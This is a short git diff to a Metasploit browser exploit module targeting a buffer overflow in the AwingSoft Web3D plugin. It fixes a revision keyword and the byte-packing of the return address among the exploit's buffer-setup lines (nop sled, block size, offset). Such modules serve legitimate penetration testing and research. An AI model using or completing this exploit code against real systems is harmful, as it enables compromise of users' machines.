diff --git a/modules/exploits/windows/browser/awingsoft_web3d_bof.rb b/modules/exploits/windows/browser/awingsoft_web3d_bof.rb index 1fa237d4ae..879f2d16f5 100644 --- a/modules/exploits/windows/browser/awingsoft_web3d_bof.rb +++ b/modules/exploits/windows/browser/awingsoft_web3d_bof.rb @@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote 'shinnai ', # Original exploit [see References] 'Trancer ' # Metasploit implementation ], - 'Version' => '$Revision:$', + 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.milw0rm.com/exploits/9116' ], @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote # Setup exploit buffers nops = Rex::Text.to_unescape([target.ret].pack('V')) - ret = Rex::Text.uri_encode([target.ret].pack('L')) + ret = Rex::Text.uri_encode([target.ret].pack('V')) blocksize = 0x40000 fillto = 500 offset = target['Offset']